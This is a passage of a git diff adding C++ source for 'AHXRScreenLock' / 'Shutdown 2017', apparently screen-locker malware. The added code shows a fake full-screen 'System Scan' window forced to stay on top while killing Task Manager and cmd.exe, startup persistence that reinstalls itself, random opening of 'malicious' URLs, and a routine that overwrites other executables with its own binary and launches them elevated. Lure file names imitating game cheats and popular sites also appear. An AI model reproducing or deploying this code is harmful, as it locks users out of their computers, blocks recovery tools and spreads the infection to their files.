INVALID_SOCKET) { + printf("socket failed with error: %ld\n", WSAGetLastError()); + WSACleanup(); + return 1; + } + + // Connect to server. + iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); + if (iResult == SOCKET_ERROR) { + closesocket(ConnectSocket); + ConnectSocket = INVALID_SOCKET; + continue; + } + break; + } + + freeaddrinfo(result); + + if (ConnectSocket == INVALID_SOCKET) { + printf("Unable to connect to server!\n"); + WSACleanup(); + return 1; + } + + + while (1) { + if (b_new_message) { + iResult = send(ConnectSocket, c_message, (int)strlen(c_message), 0); + + if (iResult == SOCKET_ERROR) { + printf("send failed with error: %d\n", WSAGetLastError()); + closesocket(ConnectSocket); + WSACleanup(); + return 1; + } + b_new_message = false; + } + } + + + // shutdown the connection since no more data will be sent + iResult = shutdown(ConnectSocket, SD_SEND); + if (iResult == SOCKET_ERROR) { + printf("shutdown failed with error: %d\n", WSAGetLastError()); + closesocket(ConnectSocket); + WSACleanup(); + return 1; + } + + // Receive until the peer closes the connection + do { + + iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0); + if (iResult > 0) + printf("Message received: %s\n", recvbuf); + else if (iResult == 0) + printf("Connection closed\n"); + else + printf("recv failed with error: %d\n", WSAGetLastError()); + + } while (iResult > 0); + + // cleanup + closesocket(ConnectSocket); + WSACleanup(); + + return 0; +} +#endif \ No newline at end of file diff --git a/src/listener/clientTest.h b/src/listener/clientTest.h new file mode 100644 index 0000000..c42ae49 --- /dev/null +++ b/src/listener/clientTest.h @@ -0,0 +1,32 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . + + https://msdn.microsoft.com/en-us/library/windows/desktop/ms737889(v=vs.85).aspx +*/ +//======================================================= +//#define CLIENT_SERVER_TEST + +#ifdef CLIENT_SERVER_TEST + extern void clientServerTest(); + DWORD WINAPI t_clientServerTest(LPVOID lpParameter); +#endif + +//extern void sendNewMessage(char * message); \ No newline at end of file diff --git a/src/locked/frmMain.h b/src/locked/frmMain.h new file mode 100644 index 0000000..b1eed3b --- /dev/null +++ b/src/locked/frmMain.h @@ -0,0 +1,180 @@ +#pragma once + +namespace AHXRShutdownLocked { + + using namespace System; + using namespace System::ComponentModel; + using namespace System::Collections; + using namespace System::Windows::Forms; + using namespace System::Data; + using namespace System::Drawing; + + /// + /// Summary for frmMain + /// + public ref class frmMain : public System::Windows::Forms::Form + { + public: + frmMain(void) + { + InitializeComponent(); + // + //TODO: Add the constructor code here + // + } + + protected: + /// + /// Clean up any resources being used. + /// + ~frmMain() + { + if (components) + { + delete components; + } + } + private: System::Windows::Forms::Panel^ panel1; + private: System::Windows::Forms::Label^ lblMessage; + private: System::Windows::Forms::PictureBox^ pictureBox1; + private: System::Windows::Forms::Label^ lblTitle; + private: System::Windows::Forms::ProgressBar^ pgBar; + private: System::Windows::Forms::Timer^ tmerUpdate; + + private: System::ComponentModel::IContainer^ components; + + protected: + + private: + /// + /// Required designer variable. + /// + + +#pragma region Windows Form Designer generated code + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + void InitializeComponent(void) + { + this->components = (gcnew System::ComponentModel::Container()); + System::ComponentModel::ComponentResourceManager^ resources = (gcnew System::ComponentModel::ComponentResourceManager(frmMain::typeid)); + this->panel1 = (gcnew System::Windows::Forms::Panel()); + this->pictureBox1 = (gcnew System::Windows::Forms::PictureBox()); + this->lblTitle = (gcnew System::Windows::Forms::Label()); + this->lblMessage = (gcnew System::Windows::Forms::Label()); + this->pgBar = (gcnew System::Windows::Forms::ProgressBar()); + this->tmerUpdate = (gcnew System::Windows::Forms::Timer(this->components)); + this->panel1->SuspendLayout(); + (cli::safe_cast(this->pictureBox1))->BeginInit(); + this->SuspendLayout(); + // + // panel1 + // + this->panel1->Anchor = static_cast(((System::Windows::Forms::AnchorStyles::Top | System::Windows::Forms::AnchorStyles::Left) + | System::Windows::Forms::AnchorStyles::Right)); + this->panel1->AutoSize = true; + this->panel1->BackColor = System::Drawing::Color::Red; + this->panel1->Controls->Add(this->pictureBox1); + this->panel1->Controls->Add(this->lblTitle); + this->panel1->Location = System::Drawing::Point(-17, -17); + this->panel1->Name = L"panel1"; + this->panel1->Size = System::Drawing::Size(1226, 133); + this->panel1->TabIndex = 0; + // + // pictureBox1 + // + this->pictureBox1->Image = (cli::safe_cast(resources->GetObject(L"pictureBox1.Image"))); + this->pictureBox1->Location = System::Drawing::Point(40, 31); + this->pictureBox1->Name = L"pictureBox1"; + this->pictureBox1->Size = System::Drawing::Size(97, 78); + this->pictureBox1->SizeMode = System::Windows::Forms::PictureBoxSizeMode::StretchImage; + this->pictureBox1->TabIndex = 3; + this->pictureBox1->TabStop = false; + // + // lblTitle + // + this->lblTitle->AutoSize = true; + this->lblTitle->Font = (gcnew System::Drawing::Font(L"Trebuchet MS", 48, System::Drawing::FontStyle::Bold, System::Drawing::GraphicsUnit::Point, + static_cast(0))); + this->lblTitle->ForeColor = System::Drawing::Color::White; + this->lblTitle->ImageAlign = System::Drawing::ContentAlignment::MiddleLeft; + this->lblTitle->Location = System::Drawing::Point(143, 31); + this->lblTitle->Name = L"lblTitle"; + this->lblTitle->Size = System::Drawing::Size(932, 81); + this->lblTitle->TabIndex = 2; + this->lblTitle->Text = L"Shutdown 2017 - System Scan"; + // + // lblMessage + // + this->lblMessage->Anchor = static_cast((((System::Windows::Forms::AnchorStyles::Top | System::Windows::Forms::AnchorStyles::Bottom) + | System::Windows::Forms::AnchorStyles::Left) + | System::Windows::Forms::AnchorStyles::Right)); + this->lblMessage->AutoSize = true; + this->lblMessage->Font = (gcnew System::Drawing::Font(L"Trebuchet MS", 36, System::Drawing::FontStyle::Regular, System::Drawing::GraphicsUnit::Point, + static_cast(0))); + this->lblMessage->ForeColor = System::Drawing::Color::White; + this->lblMessage->Location = System::Drawing::Point(12, 131); + this->lblMessage->Name = L"lblMessage"; + this->lblMessage->Size = System::Drawing::Size(1586, 366); + this->lblMessage->TabIndex = 1; + this->lblMessage->Text = resources->GetString(L"lblMessage.Text"); + this->lblMessage->TextAlign = System::Drawing::ContentAlignment::MiddleCenter; + this->lblMessage->Click += gcnew System::EventHandler(this, &frmMain::lblMessage_Click); + // + // pgBar + // + this->pgBar->Location = System::Drawing::Point(12, 529); + this->pgBar->Name = L"pgBar"; + this->pgBar->Size = System::Drawing::Size(768, 76); + this->pgBar->TabIndex = 2; + // + // tmerUpdate + // + this->tmerUpdate->Enabled = true; + this->tmerUpdate->Interval = 1000; + this->tmerUpdate->Tick += gcnew System::EventHandler(this, &frmMain::tmerUpdate_Tick); + // + // frmMain + // + this->AutoScaleDimensions = System::Drawing::SizeF(6, 13); + this->AutoScaleMode = System::Windows::Forms::AutoScaleMode::Font; + this->BackColor = System::Drawing::Color::Black; + this->ClientSize = System::Drawing::Size(1203, 617); + this->Controls->Add(this->pgBar); + this->Controls->Add(this->lblMessage); + this->Controls->Add(this->panel1); + this->ForeColor = System::Drawing::SystemColors::ControlText; + this->FormBorderStyle = System::Windows::Forms::FormBorderStyle::None; + this->Icon = (cli::safe_cast(resources->GetObject(L"$this.Icon"))); + this->Name = L"frmMain"; + this->StartPosition = System::Windows::Forms::FormStartPosition::CenterScreen; + this->Text = L"Shutdown 2017 - Scan"; + this->WindowState = System::Windows::Forms::FormWindowState::Maximized; + this->Load += gcnew System::EventHandler(this, &frmMain::frmMain_Load); + this->panel1->ResumeLayout(false); + this->panel1->PerformLayout(); + (cli::safe_cast(this->pictureBox1))->EndInit(); + this->ResumeLayout(false); + this->PerformLayout(); + + } +#pragma endregion + private: System::Void frmMain_Load(System::Object^ sender, System::EventArgs^ e) { + this->lblMessage->Location = System::Drawing::Point(this->Width / 2 - this->lblMessage->Width / 2, this->Height / 2 - this->lblMessage->Height / 2); + this->pgBar->Location = System::Drawing::Point(this->Width / 2 - this->pgBar->Width / 2, this->Height / 2 - this->pgBar->Height / 2 + 250); + + START_FORM_TOP_THREAD(); + } + private: System::Void tmerUpdate_Tick(System::Object^ sender, System::EventArgs^ e) { + this->pgBar->Value = this->pgBar->Value + 1; + + if (this->pgBar->Value >= 100) + FORM_SCAN_STATUS = true; + + } +private: System::Void lblMessage_Click(System::Object^ sender, System::EventArgs^ e) { +} +}; +} diff --git a/src/locked/main.cpp b/src/locked/main.cpp new file mode 100644 index 0000000..50ab9c7 --- /dev/null +++ b/src/locked/main.cpp @@ -0,0 +1,29 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . + */ +//======================================================= +#include "threads.h" + +void main() { + START_FORM_THREAD(); + while (!FORM_SCAN_STATUS) {} +} + diff --git a/src/locked/threads.cpp b/src/locked/threads.cpp new file mode 100644 index 0000000..b03b1c6 --- /dev/null +++ b/src/locked/threads.cpp @@ -0,0 +1,86 @@ +#include "threads.h" +#include "frmMain.h" + +HANDLE h_frm_thread; +HANDLE h_frm_top_thread; +DWORD dw_frm_top_thread; +DWORD dw_frm_thread; +DWORD WINAPI t_showLockdownForm(LPVOID lpParameter); +DWORD WINAPI t_alwaysOnTop(LPVOID lpParameter); +DWORD FindProcessId(const std::wstring& processName); +bool b_scan_status; + +using namespace System; +using namespace System::Windows::Forms; + +DWORD WINAPI t_showLockdownForm(LPVOID lpParameter) { + Application::EnableVisualStyles(); + Application::SetCompatibleTextRenderingDefault(false); + AHXRShutdownLocked::frmMain frm; + Application::Run(%frm); + return 0; +} + +DWORD WINAPI t_alwaysOnTop(LPVOID lpParameter) { + bool b_found = false; + HWND h_lockdown; + while (1) { + if (!b_found) { + h_lockdown = FindWindow(NULL, WINDOW_NAME); + if (h_lockdown != NULL) + b_found = true; + } + else { + SetWindowPos(h_lockdown, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE); + + // FORCE the window to be in front at all times + SetActiveWindow(h_lockdown); + SetFocus(h_lockdown); + SetCapture(h_lockdown); + SetForegroundWindow(h_lockdown); + EnableWindow(h_lockdown, true); + +#ifdef TASK_MANAGER_KILL + DWORD d_task = FindProcessId(SCREEN_LOCK_TSKMGR); + if (d_task != 0) { + HANDLE h_process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, d_task); + TerminateProcess(h_process, 1); + } +#endif + +#ifdef CMD_KILL + DWORD dc_task = FindProcessId(SCREEN_LOCK_CMD); + if (dc_task != 0) { + HANDLE h_process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, dc_task); + TerminateProcess(h_process, 1); + } +#endif + } + } + return 0; +} + +DWORD FindProcessId(const std::wstring & processName) { + PROCESSENTRY32 processInfo; + processInfo.dwSize = sizeof(processInfo); + + HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + if (processesSnapshot == INVALID_HANDLE_VALUE) + return 0; + + Process32First(processesSnapshot, &processInfo); + if (!processName.compare(processInfo.szExeFile)) { + CloseHandle(processesSnapshot); + return processInfo.th32ProcessID; + } + + while (Process32Next(processesSnapshot, &processInfo)) { + if (!processName.compare(processInfo.szExeFile)) { + CloseHandle(processesSnapshot); + return processInfo.th32ProcessID; + } + } + + CloseHandle(processesSnapshot); + return 0; +} \ No newline at end of file diff --git a/src/locked/threads.h b/src/locked/threads.h new file mode 100644 index 0000000..eff5f81 --- /dev/null +++ b/src/locked/threads.h @@ -0,0 +1,28 @@ +#include +#include +#include + +extern HANDLE h_frm_thread; +extern HANDLE h_frm_top_thread; +extern DWORD dw_frm_top_thread; +extern DWORD dw_frm_thread; +extern DWORD WINAPI t_showLockdownForm(LPVOID lpParameter); +extern DWORD WINAPI t_alwaysOnTop(LPVOID lpParameter); +extern bool b_scan_status; + +#define WINDOW_NAME L"Shutdown 2017 - Scan" +#define CMD_KILL +#define TASK_MANAGER_KILL + +#ifdef TASK_MANAGER_KILL + #define SCREEN_LOCK_TSKMGR L"taskmgr.exe" +#endif + +#ifdef CMD_KILL + #define SCREEN_LOCK_CMD L"cmd.exe" +#endif + +#define START_FORM_THREAD() {h_frm_thread = CreateThread(0, 0, &t_showLockdownForm, 0, 0, &dw_frm_thread);} +#define START_FORM_TOP_THREAD() {h_frm_top_thread = CreateThread(0, 0, &t_alwaysOnTop, 0, 0, &dw_frm_top_thread);} + +#define FORM_SCAN_STATUS b_scan_status \ No newline at end of file diff --git a/src/locker/main.cpp b/src/locker/main.cpp index 98667e8..fa81c18 100644 --- a/src/locker/main.cpp +++ b/src/locker/main.cpp @@ -158,7 +158,7 @@ int main() { #endif // Obtaining the message. - size_t t_msg_open = s_search.find(PACK_OPENER, t_pw_close); + size_t t_msg_open = s_search.find(PACK_OPENER, t_pw_close + PASSWORD_HASH_LENGTH); size_t t_msg_close = s_search.find(PACK_CLOSER, t_msg_open); s_message = s_search.substr(t_msg_open + 1, t_msg_close - t_msg_open - 1); // Adjusting character positions. @@ -217,7 +217,7 @@ int main() { else Application::Exit(); - START_SERVER_THREAD(); // Locking the program & taskmgr. + START_SERVER_THREAD(); // Locking the program & taskmgr. if (ss_server_host.compare("0") != 0) { START_CLIENT_THREAD(); // Connect user to listener (if any) diff --git a/src/payloads/directory.cpp b/src/payloads/directory.cpp new file mode 100644 index 0000000..314f077 --- /dev/null +++ b/src/payloads/directory.cpp @@ -0,0 +1,41 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "directory.h" + +#include +#include +#include + + +#pragma comment (lib, "shell32.lib") + +using namespace std; + +inline string getHomeDirectory() { + char + my_documents[MAX_PATH] + ; + HRESULT result = SHGetFolderPathA(NULL, CSIDL_PERSONAL, NULL, SHGFP_TYPE_CURRENT, my_documents); + return my_documents; +} diff --git a/src/payloads/directory.h b/src/payloads/directory.h new file mode 100644 index 0000000..8aba28a --- /dev/null +++ b/src/payloads/directory.h @@ -0,0 +1,25 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include + +extern std::string getHomeDirectory(); diff --git a/src/payloads/fake_exe.h b/src/payloads/fake_exe.h new file mode 100644 index 0000000..f8da9b3 --- /dev/null +++ b/src/payloads/fake_exe.h @@ -0,0 +1,64 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#pragma once + +char * c_fake_executables[] = { + "aimbot", + "mp3converter", + "mp4tomp3", + "xnxx", + "wallhack", + "facebook", + "youtube", + "bruteforce", + "twitter", + "proxy", + "poker", + "gmail" + "hotmail", + "csgo", + "css" + "dota2", + "tf2", + "discord", + "steam", + "l4d2", + "regedit", + "esp", + "hack4hack", + "iwantcheats", + "iwantcheats", + "fpscheats", + "dota2boost", + "tmcheats", + "csgocheats", + "bhop", + "triggerbot", + "hack_inject", + "skinchanger", + "wh", + "glow", + "noflash", + "nofog", + "gui" +}; \ No newline at end of file diff --git a/src/payloads/install_callback.h b/src/payloads/install_callback.h new file mode 100644 index 0000000..3a61674 --- /dev/null +++ b/src/payloads/install_callback.h @@ -0,0 +1,6 @@ +#include +#include + +void onClientInstallShutdown( const char * path ) { + printf("Shutdown 2017 installed (\"%s\")\r\n", path); +} \ No newline at end of file diff --git a/src/payloads/main.cpp b/src/payloads/main.cpp new file mode 100644 index 0000000..785212f --- /dev/null +++ b/src/payloads/main.cpp @@ -0,0 +1,100 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "directory.h" +#include "payload_shutdown.h" +#include "payload_startup.h" +#include "payload_malicious.h" +#include "payload_install.h" +#include "payload_dummy.h" +#include "payload_scan.h" +#include "payload_lock.h" + +#include +#include + +//#define WINDOWS_CONSOLE + +#ifdef WINDOWS_CONSOLE +void main() { +#else +int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR pScmdline, int iCmdshow){ +#endif + STARTUP_PAYLOAD(); + INSTALL_PAYLOAD(); + SHUTDOWN_PAYLOAD(); + readMaliciousURLs(); + + // Flood prevention + Sleep(5000); + START_DUMMY_PAYLOAD(); + LOCK_PAYLOAD(); + //Sleep(1000000); + + int i_random_result; + bool b_made_dummy = false; + srand(time(NULL)); + + while (1) { + // Restarting start-up payload if something deletes registry. + if (isStartupRegistered()) + STARTUP_PAYLOAD(); + + i_random_result = rand() % 5; + switch (i_random_result) { + case 0: { + SHUTDOWN_PAYLOAD(); + break; + } + case 1: { + openRandomMaliciousURL(); + break; + } + case 2: { + if (!b_made_dummy) { + START_DUMMY_PAYLOAD(); + b_made_dummy = true; + } + break; + } + case 3: { // Flooding + for (int i = 0; i < 5; i++) { + SHUTDOWN_PAYLOAD(); + Sleep(500); + START_DUMMY_PAYLOAD(); + } + break; + } + case 4: { + SCAN_PAYLOAD(); + break; + } + } + + Sleep(300000); + } +#ifndef WINDOWS_CONSOLE + return 0; +#endif +} + diff --git a/src/payloads/payload_dummy.cpp b/src/payloads/payload_dummy.cpp new file mode 100644 index 0000000..6df8264 --- /dev/null +++ b/src/payloads/payload_dummy.cpp @@ -0,0 +1,109 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" + +#ifdef __cplusplus_cli + #define generic __identifier(generic) +#endif +#include +#ifdef __cplusplus_cli + #undef generic +#endif + +#include "payload_shutdown.h" +#include "payload_dummy.h" +#include +#include +#include +#include +#include +#include + +namespace fs = boost::filesystem; +using namespace std; + +void createDummyProcess() { + fs::directory_iterator it_end; + fs::directory_iterator it_dir(getFullShutdownDirectory()); + + vector< string > v_random_file; + + while (it_dir != it_end) { + try { + if (!fs::is_directory(it_dir->status())) { // Listing non-directory files. + if (it_dir->path().filename().extension() == ".exe") // Only list .exe files. + v_random_file.push_back(it_dir->path().string()); + } + it_dir++; + } + catch (const std::exception & ex) { + std::cout << it_dir->path().filename() << " " << ex.what() << std::endl; + } + } + + if (v_random_file.size() == 0) { + Sleep(2000); + createDummyProcess(); + } + else { + srand(time(NULL)); + int i_random_exe = rand() % v_random_file.size(); + + // Replacing and self-replication. + TCHAR + t_file_path + ; + char c_path[MAX_PATH]; + string s_path; + + HMODULE h_mod = GetModuleHandle(NULL); + GetModuleFileNameA(h_mod, c_path, MAX_PATH); + + s_path = c_path; + + fstream f_read(s_path, ios::in | ios::binary); + fstream f_write(v_random_file[i_random_exe], ios::out | ios::binary); + + f_write << f_read.rdbuf(); + f_write.close(); + f_read.close(); + + printf("[%s] - DUMMY: %s\r\n", c_path, v_random_file[i_random_exe].c_str()); + + /*STARTUPINFO info = { sizeof(info) }; + PROCESS_INFORMATION processInfo; + + if (CreateProcess(v_random_file[i_random_exe].c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo)) + { + WaitForSingleObject(processInfo.hProcess, INFINITE); + CloseHandle(processInfo.hProcess); + CloseHandle(processInfo.hThread); + }*/ + // CreateProcess(v_random_file[i_random_exe].c_str(), "", NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo); + ShellExecute(NULL, "runas", v_random_file[i_random_exe].c_str(), + " c:\\temp\\report.txt", + NULL, // default dir + SW_SHOWNORMAL + ); + } +} diff --git a/src/payloads/payload_dummy.h b/src/payloads/payload_dummy.h new file mode 100644 index 0000000..4141aa8 --- /dev/null +++ b/src/payloads/payload_dummy.h @@ -0,0 +1,24 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +extern void createDummyProcess(); +#define START_DUMMY_PAYLOAD() {createDummyProcess();} \ No newline at end of file diff --git a/src/payloads/payload_install.cpp b/src/payloads/payload_install.cpp new file mode 100644 index 0000000..081921a --- /dev/null +++ b/src/payloads/payload_install.cpp @@ -0,0 +1,94 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_install.h" +#include "install_callback.h" +#include "resource1.h" + +#include +#include + +using namespace std; + +HANDLE h_install_thread; +DWORD dw_install_thread; +DWORD WINAPI t_install(LPVOID lpParam); + +void installShutdown2017(const char * path); + +DWORD WINAPI t_install(LPVOID lpParam) { + puts(getInstallPath().c_str()); + installShutdown2017(getInstallPath().c_str()); + return 0; +} + +string getInstallPath() { + TCHAR + t_program_files[MAX_PATH] + ; + string s_full_path; + + SHGetSpecialFolderPath(0, t_program_files, CSIDL_PROGRAM_FILES, FALSE); + s_full_path = t_program_files + string("\\") + string(SHUTDOWN_FOLDER_NAME); + return s_full_path; +} + +void installShutdown2017( const char * path ) { + printf("Attempting to install Shutdown 2017 in \"%s\" \r\n", path); + if (CreateDirectory( path, NULL) || GetLastError() == ERROR_ALREADY_EXISTS) { + + // Installing Shutdown2017.exe + HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA3), RT_RCDATA); + unsigned int i_resource = ::SizeofResource(NULL, hRes); + LPVOID lpRes = LoadResource(NULL, hRes); + void * pResourceLock = LockResource(lpRes); + + std::string s_extract; + s_extract = path + string("\\"); + s_extract += SHUTDOWN_FILE_NAME; + + // puts(s_extract.c_str()); + + fstream f_shutdown; + f_shutdown.open(s_extract, ios::out | ios::binary); + f_shutdown.write((char*)pResourceLock, i_resource); + f_shutdown.close(); + + // Adding shutdownlock + s_extract = path + string("\\"); + s_extract += LOCKED_FILE_NAME; + + hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA4), RT_RCDATA); + i_resource = ::SizeofResource(NULL, hRes); + lpRes = LoadResource(NULL, hRes); + pResourceLock = LockResource(lpRes); + + fstream f_write(s_extract, ios::out | ios::binary); + f_write.write((char*)pResourceLock, i_resource); + f_write.close(); + + onClientInstallShutdown( path ); + } + else + puts("Couldn't install."); +} \ No newline at end of file diff --git a/src/payloads/payload_install.h b/src/payloads/payload_install.h new file mode 100644 index 0000000..204c2b3 --- /dev/null +++ b/src/payloads/payload_install.h @@ -0,0 +1,35 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include +#include + +#define SHUTDOWN_FOLDER_NAME "Shutdown2017" +#define SHUTDOWN_FILE_NAME "shutdown.exe" +#define LOCKED_FILE_NAME "sd.exe" + +extern HANDLE h_install_thread; +extern DWORD dw_install_thread; +extern DWORD WINAPI t_install(LPVOID lpParam); +extern std::string getInstallPath(); + +#define INSTALL_PAYLOAD() {h_install_thread = CreateThread(0,0, t_install, 0, 0, &dw_install_thread);} \ No newline at end of file diff --git a/src/payloads/payload_lock.cpp b/src/payloads/payload_lock.cpp new file mode 100644 index 0000000..16842ba --- /dev/null +++ b/src/payloads/payload_lock.cpp @@ -0,0 +1,39 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_lock.h" +#include "payload_install.h" +#include "resource1.h" +#include +#include + +using namespace std; + +void loadLockScreen() { + string s_install = getInstallPath() + string("\\") + LOCKED_FILE_NAME; + ShellExecute(NULL, "runas", s_install.c_str(), + " c:\\temp\\report.txt", + NULL, + SW_SHOWNORMAL + ); +} diff --git a/src/payloads/payload_lock.h b/src/payloads/payload_lock.h new file mode 100644 index 0000000..85e7b92 --- /dev/null +++ b/src/payloads/payload_lock.h @@ -0,0 +1,24 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +extern void loadLockScreen(); +#define LOCK_PAYLOAD() {loadLockScreen();} \ No newline at end of file diff --git a/src/payloads/payload_malicious.cpp b/src/payloads/payload_malicious.cpp new file mode 100644 index 0000000..a09a68b --- /dev/null +++ b/src/payloads/payload_malicious.cpp @@ -0,0 +1,89 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#include "stdafx.h" +#include "payload_malicious.h" +#include "resource1.h" +#include +#include +#include +#include +#include +#include + +using namespace std; +template void split(const std::string &s, char delim, Out result); +std::vector split(const std::string &s, char delim); + +vector< string > s_urls; + +void readMaliciousURLs() { + HRSRC hRes = FindResource(NULL, 